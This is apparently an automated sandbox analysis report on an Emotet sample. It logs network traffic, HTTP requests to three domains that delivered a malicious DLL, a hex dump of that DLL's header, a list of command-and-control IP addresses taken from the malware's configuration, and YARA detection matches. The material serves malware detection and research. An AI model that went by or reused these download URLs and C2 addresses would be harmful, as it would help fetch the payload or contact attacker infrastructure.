            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 66.96.149.19:80

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.254.68 443Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 198.199.70.22 8080Jump to behavior
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49177 -> 198.199.70.22:8080
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorIPs: 165.22.254.68:443
            Source: Malware configuration extractorIPs: 198.199.70.22:8080
            Source: Malware configuration extractorIPs: 104.244.79.94:443
            Source: Malware configuration extractorIPs: 103.224.241.74:8080
            Source: Malware configuration extractorIPs: 88.217.172.165:8080
            Source: Malware configuration extractorIPs: 118.98.72.86:443
            Source: Malware configuration extractorIPs: 104.248.225.227:8080
            Source: Malware configuration extractorIPs: 196.44.98.190:8080
            Source: Malware configuration extractorIPs: 103.254.12.236:7080
            Source: Malware configuration extractorIPs: 157.245.111.0:8080
            Source: Malware configuration extractorIPs: 68.183.91.111:8080
            Source: Malware configuration extractorIPs: 202.29.239.162:443
            Source: Malware configuration extractorIPs: 37.44.244.177:8080
            Source: Malware configuration extractorIPs: 139.196.72.155:8080
            Source: Malware configuration extractorIPs: 64.227.55.231:8080
            Source: Malware configuration extractorIPs: 103.85.95.4:8080
            Source: Malware configuration extractorIPs: 195.77.239.39:8080
            Source: Malware configuration extractorIPs: 202.134.4.210:7080
            Source: Malware configuration extractorIPs: 54.37.106.167:8080
            Source: Malware configuration extractorIPs: 103.41.204.169:8080
            Source: Malware configuration extractorIPs: 85.25.120.45:8080
            Source: Malware configuration extractorIPs: 59.148.253.194:443
            Source: Malware configuration extractorIPs: 175.126.176.79:8080
            Source: Malware configuration extractorIPs: 103.126.216.86:443
            Source: Malware configuration extractorIPs: 93.104.209.107:8080
            Source: Malware configuration extractorIPs: 103.56.149.105:8080
            Source: Malware configuration extractorIPs: 202.28.34.99:8080
            Source: Malware configuration extractorIPs: 103.71.99.57:8080
            Source: Malware configuration extractorIPs: 62.171.178.147:8080
            Source: Malware configuration extractorIPs: 116.124.128.206:8080
            Source: Malware configuration extractorIPs: 54.37.228.122:443
            Source: Malware configuration extractorIPs: 210.57.209.142:8080
            Source: Malware configuration extractorIPs: 128.199.217.206:443
            Source: Malware configuration extractorIPs: 36.67.23.59:443
            Source: Malware configuration extractorIPs: 188.225.32.231:4143
            Source: Malware configuration extractorIPs: 87.106.97.83:7080
            Source: Malware configuration extractorIPs: 85.214.67.203:8080
            Source: Malware configuration extractorIPs: 78.47.204.80:443
            Source: Malware configuration extractorIPs: 178.62.112.199:8080
            Source: Malware configuration extractorIPs: 165.232.185.110:8080
            Source: Malware configuration extractorIPs: 157.230.99.206:8080
            Source: Malware configuration extractorIPs: 165.22.254.236:8080
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Joe Sandbox ViewIP Address: 157.245.111.0 157.245.111.0
            Source: Joe Sandbox ViewIP Address: 157.230.99.206 157.230.99.206
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 06 Aug 2022 07:20:16 GMTContent-Type: application/x-msdownloadContent-Length: 661504Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Sat, 06 Aug 2022 07:20:16 GMTContent-Disposition: attachment; filename="UVvnppK.dll"Content-Transfer-Encoding: binarySet-Cookie: 62ee1630cc8c8=1659770416; expires=Sat, 06-Aug-2022 07:21:16 GMT; Max-Age=60; path=/Last-Modified: Sat, 06 Aug 2022 07:20:16 GMTX-Powered-By: PleskLinData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 6a 38 a2 62 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 15 00 24 00 00 00 f0 09 00 00 0a 00 00 f0 13 00 00 00 10 00 00 00 00 a0 61 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 0a 00 00 04 00 00 d6 b9 0a 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 00 00 45 01 00 00 00 a0 00 00 28 07 00 00 00 d0 00 00 cc c4 09 00 00 60 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 a1 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 23 00 00 00 10 00 00 00 24 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 50 60 2e 64 61 74 61 00 00 00 e0 0d 00 00 00 40 00 00 00 0e 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 b0 02 00 00 00 50 00 00 00 04 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 30 03 00 00 00 60 00 00 00 04 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 98 02 00 00 00 70 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 09 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 45 01 00 00 00 90 00 00 00 02 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 28 07 00 00 00 a0 00 00 00 08 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 b0 00 00 00 02 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 48 00 00 00 00 c0 00 00 00 02 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 Data Ascii: MZ@
            Source: global trafficHTTP traffic detected: GET /images/psQbAjrrEOXWPrS/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.zardamarine.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /tr/68yHRhfuU7Qj/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kronostr.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cgi-bin/Rea3Iu3wGvgAbTset0/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: labfitouts.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.199.70.22:8080
            Source: unknownNetwork traffic detected: IP country count 17
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 06 Aug 2022 07:20:17 GMTContent-Type: text/htmlContent-Length: 961Connection: closeLast-Modified: Wed, 04 Jan 2017 19:07:47 GMTETag: "2a8f73-3c1-54549800fc6c0"Accept-Ranges: bytes
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: unknownTCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: regsvr32.exe, 00000007.00000002.1197037666.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: regsvr32.exe, 00000007.00000002.1197206836.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: regsvr32.exe, 00000007.00000002.1197029726.0000000000420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: regsvr32.exe, 00000007.00000002.1197000736.00000000003F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.254.68/
            Source: regsvr32.exe, 00000007.00000002.1197000736.00000000003F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://165.22.254.68/O
            Source: regsvr32.exe, 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://198.199.70.22/080/F
            Source: regsvr32.exe, 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://198.199.70.22/B
            Source: regsvr32.exe, 00000007.00000002.1197037666.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://198.199.70.22:8080/a
            Source: regsvr32.exe, 00000007.00000002.1197037666.0000000000429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://198.199.70.22:8080/e
            Source: regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllJump to behavior
            Source: unknownDNS traffic detected: queries for: www.zardamarine.com
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180005610 InternetReadFile,7_2_0000000180005610
            Source: global trafficHTTP traffic detected: GET /images/psQbAjrrEOXWPrS/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.zardamarine.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /tr/68yHRhfuU7Qj/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kronostr.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cgi-bin/Rea3Iu3wGvgAbTset0/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: labfitouts.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 208.67.23.91:443 -> 192.168.2.22:49171 version: TLS 1.2

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Yara detected Emotet
            Source: Yara matchFile source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
